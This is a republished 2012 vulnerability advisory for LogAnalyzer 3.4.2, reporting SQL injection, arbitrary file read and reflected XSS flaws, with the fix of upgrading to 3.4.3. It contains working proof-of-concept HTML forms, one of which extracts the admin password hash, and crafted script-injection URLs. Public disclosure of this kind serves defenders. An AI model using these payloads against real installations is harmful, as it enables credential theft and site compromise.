Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  b2ePMS 1.0 Authentication Bypass Vulnerability

  Liferay users can assign themselves to organizations, leading to possible privilege escalation

  Liferay 6.1 json webservices are subject to cross-site request forgery attacks

  Liferay 6.1 can be compromised without having an account on the portal

From:Filippo Cavallarin <filippo.cavallarin_(at)_codseq.it>
Date:3 июня 2012 г.
Subject:Multiple vulnerabilities in LogAnalyzer

Advisory ID:    CSA-12005
Title:  Multiple vulnerabilities in LogAnalyzer
Product:        LogAnalyzer
Version:        3.4.2 and probably prior
Vendor: adiscon.com
Vulnerability type:     SQL injection, XSS, Arbitrary File Read
Risk level:     2 / 3
Credit: www.codseq.it
CVE:    
Vendor notification:    2012-05-21
Public disclosure:      2012-05-23


Details

LogAnalyzer version 3.4.2 and probably below suffers from multiple vulnerabilities:

- SQL Injection

1) The script admin/views.php contains a SQL-Injection vulnerability when used to create a new view. It can be exploited by a non-admin user (with write access) to insert arbitrary data into logcon_views table.
The vulnerability exists due to the failure in the script to sanytize the POST variable "Columns" before use it to build a SQL query.

This PoC creates an arbitrary record into logcon_views table.


<form method=post action="http://127.0.0.1/loganalyzer-3.4.2/admin/views.php">
<input name="DisplayName" value="dontcare">
<input name="isuseronly" value="2">
<input name="Columns[]" value="',2,null) ,('arbitrary','',1,2), ('dontcare2','">
<input name="op" value="addnewview">
<input type=submit value="go!">
</form>




2) The script admin/views.php contains a SQL-Injection vulnerability when used to update a view. It can be exploited by a non-admin user (with write access) to obtain arbitrary database data.
The vulnerability exists due to the failure in the script to sanytize the POST variable "Columns" before use it to build a SQL query.

This PoC updates a view and sets the admin password (md5) as the view name


<form method=post action="http://127.0.0.1/loganalyzer-3.4.2/admin/views.php">
<input name="DisplayName" value="dontcare">
<input name="isuseronly" value="2">
<input name="Columns[]" value="',DisplayName=(select password from logcon_users where username='admin'),Columns='">
<input name="op" value="editview">
<input name="id" value="1">
<input type=submit value="go!">
</form>






- Arbitrary File Read

LogAnalyzer allows non-admin users (with write access) to create a diskfile source with an arbitrary value as "syslog file" parameter. By setting this parameter to "config.php", the configuration file is disclosed when the source is loaded.







- Cross Site Scripting


1) The input passed via the "filter" parameter to index.php is not properly sanitised before being returned to the user.
http://127.0.0.1/loganalyzer-3.4.2/index.php?filter=%3C/title%3E%3Csc
ript%3Ealert
(1)%3C/script%3E


2) The input passed via the "id" parameter to admin/reports.php is not properly sanitised before being returned to the user.
http://127.0.0.1/loganalyzer-3.4.2/admin/reports.php?op=details&id=eventsumma
ry%3Cscript%3Ealert
(1)%3C/script%3E


3) The input passed via the "id" parameter to admin/searches.php is not properly sanitised before being returned to the user.
http://127.0.0.1/loganalyzer-3.4.2/admin/searches.php?op=edit&id=7%3Cscri
pt%3Ealert
(1)%3C/script%3E




Solution

upgrade to LogAnalyzer 3.4.3






Filippo Cavallarin


C o d S e q
Development with an eye on security
------------------------------------------------------------------------
Castello 2005, 30122 Venezia
Tel: 041 88 761 58 - Fax: 041 81 064 714 - Cell: 346 66 93 254
c.f. CVLFPP82B27L736J - p.iva 03737650279
http://www.codseq.it - [email protected]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород